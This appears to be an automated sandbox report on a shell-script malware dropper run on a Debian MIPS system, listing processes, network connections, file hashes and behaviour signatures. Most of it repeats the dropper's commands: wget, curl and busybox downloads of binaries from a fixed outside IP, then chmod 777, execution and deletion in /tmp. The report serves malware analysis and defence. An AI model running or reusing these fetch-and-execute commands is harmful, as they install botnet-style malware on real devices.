/usr/bin/curl

[curl -O http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/chmod

[chmod 777 I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV

[./I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/bin/rm

[rm I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV]

/usr/bin/wget

[wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/chmod

[chmod 777 IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi

[./IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/bin/rm

[rm IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi]

/usr/bin/wget

[wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/chmod

[chmod 777 yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM

[./yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/bin/rm

[rm yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM]

/usr/bin/wget

[wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/chmod

[chmod 777 kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO

[./kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/bin/rm

[rm kKiltJxtBfNkFAkv2yExmG347TjI20SHBO]

/usr/bin/wget

[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/chmod

[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN

[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/rm

[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/wget

[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/chmod

[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e

[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/rm

[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/wget

[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/chmod

[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc

[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/rm

[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/wget

[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/chmod

[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ

[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/rm

[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/chmod

[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy

[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/rm

[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/wget

[wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/chmod

[chmod 777 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH

[./81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/bin/rm

[rm 81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH]

/usr/bin/wget

[wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/chmod

[chmod 777 FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3

[./FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/bin/rm

[rm FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3]

/usr/bin/wget

[wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/chmod

[chmod 777 Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk

[./Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/bin/rm

[rm Bm41gwbeemewl88MTcw92QLt84X6ged9hk]

/usr/bin/wget

[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/chmod

[chmod 777 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc

[./1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/bin/rm

[rm 1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/wget

[wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/chmod

[chmod 777 VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx

[./VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

/bin/rm

[rm VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx]

Network

Country Destination Domain Proto
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp
BG 87.120.125.191:80 87.120.125.191 tcp

Files

/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN

MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97

memory/836-1-0xb66a5000-0xb66b6044-memory.dmp

memory/841-2-0xb66e9000-0xb66fa044-memory.dmp

memory/842-3-0xb66f4000-0xb6705044-memory.dmp

memory/885-4-0xb6726000-0xb6737044-memory.dmp

memory/909-5-0xb6780000-0xb6791044-memory.dmp

memory/921-6-0xb66b6000-0xb66c7044-memory.dmp

Analysis: behavioral3

Detonation Overview

Submitted

2024-11-21 01:00

Reported

2024-11-21 01:02

Platform

debian9-mipsbe-20240611-en

Max time kernel

71s

Max time network

74s

Command Line

[/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh]

Signatures

File and Directory Permissions Modification

defense_evasion
Description Indicator Process Target
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A
N/A N/A /bin/chmod N/A

Executes dropped EXE

Description Indicator Process Target
N/A /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN N/A
N/A /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e N/A
N/A /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc N/A
N/A /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ N/A
N/A /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy N/A
N/A /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc N/A
N/A /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx N/A
N/A /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH N/A
N/A /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 N/A
N/A /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk N/A
N/A /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO N/A
N/A /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV N/A
N/A /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi N/A
N/A /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM N/A
N/A /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV N/A
N/A /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi N/A
N/A /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM N/A
N/A /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO N/A
N/A /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN N/A
N/A /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e N/A
N/A /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc N/A
N/A /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ N/A
N/A /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy N/A
N/A /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH N/A
N/A /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 N/A
N/A /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk N/A
N/A /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc N/A
N/A /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx N/A

Reads runtime system information

discovery
Description Indicator Process Target
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A
File opened for reading /proc/sys/crypto/fips_enabled /usr/bin/curl N/A

Writes file to tmp directory

Description Indicator Process Target
File opened for modification /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /usr/bin/curl N/A
File opened for modification /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /usr/bin/curl N/A
File opened for modification /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /usr/bin/curl N/A
File opened for modification /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /usr/bin/curl N/A
File opened for modification /tmp/81sh4e8RHuikFDRU4Qz6dKclzZYP9IfYZH /usr/bin/curl N/A
File opened for modification /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /usr/bin/curl N/A
File opened for modification /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /usr/bin/curl N/A
File opened for modification /tmp/FwPpEyX5Ifev0cX1LQsGsf3TLBFWpJBDg3 /usr/bin/curl N/A
File opened for modification /tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc /usr/bin/curl N/A
File opened for modification /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /usr/bin/curl N/A
File opened for modification /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /usr/bin/curl N/A
File opened for modification /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /usr/bin/curl N/A
File opened for modification /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /usr/bin/curl N/A
File opened for modification /tmp/yN6yX5BGqlEDidtPMfzlojRq1pjRCTutZM /usr/bin/curl N/A
File opened for modification /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /usr/bin/curl N/A
File opened for modification /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /usr/bin/curl N/A
File opened for modification /tmp/VAdl0A7vhpb41Jn4n25QrtAnnSHM2CKQWx /usr/bin/curl N/A
File opened for modification /tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN /usr/bin/curl N/A
File opened for modification /tmp/I5jpZCqD4dxtxZtxqyksoAxhOLbOw3KEYV /usr/bin/curl N/A
File opened for modification /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /usr/bin/curl N/A
File opened for modification /tmp/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc /usr/bin/curl N/A
File opened for modification /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /usr/bin/curl N/A
File opened for modification /tmp/IfE7WXZmycyVrdX8kjPdNmgrYOodFDWJIi /usr/bin/curl N/A
File opened for modification /tmp/kKiltJxtBfNkFAkv2yExmG347TjI20SHBO /usr/bin/curl N/A
File opened for modification /tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e /usr/bin/curl N/A
File opened for modification /tmp/Bm41gwbeemewl88MTcw92QLt84X6ged9hk /usr/bin/curl N/A
File opened for modification /tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ /usr/bin/curl N/A
File opened for modification /tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy /usr/bin/curl N/A

Processes

/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh

[/tmp/59a56859b16d3d89334ed2d054cc2b5383bbb18ee44d9c24a8e963fcc747119d.sh]

/bin/rm

[/bin/rm bins.sh]

/usr/bin/wget

[wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/chmod

[chmod 777 YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/tmp/YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN

[./YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/bin/rm

[rm YuZyrsyH933Cus2bJEcS02AUZYX1CEqRqN]

/usr/bin/wget

[wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/chmod

[chmod 777 Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/tmp/Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e

[./Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/bin/rm

[rm Tn7AOgFSxEpxjBhBikhBhEbu2ZWstGCu7e]

/usr/bin/wget

[wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/chmod

[chmod 777 pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/tmp/pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc

[./pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/bin/rm

[rm pC8GBiJ678BW4Pkwfc39K8sIOKedzVKlRc]

/usr/bin/wget

[wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/chmod

[chmod 777 FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/tmp/FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ

[./FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/bin/rm

[rm FdpFsZ8mgglw9zWCaIloV8vZXLgse28FGZ]

/usr/bin/wget

[wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/curl

[curl -O http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/busybox

[/bin/busybox wget http://87.120.125.191/bins/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/chmod

[chmod 777 ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/tmp/ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy

[./ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/bin/rm

[rm ioSqiGIyn1UJapp81Ga9XJhyMPkg2y2HDy]

/usr/bin/wget

[wget http://87.120.125.191/bins/1gWvwGoOH8HTLIlPkXeLxBgmsAwk80MTuc]

/usr/bin/curl

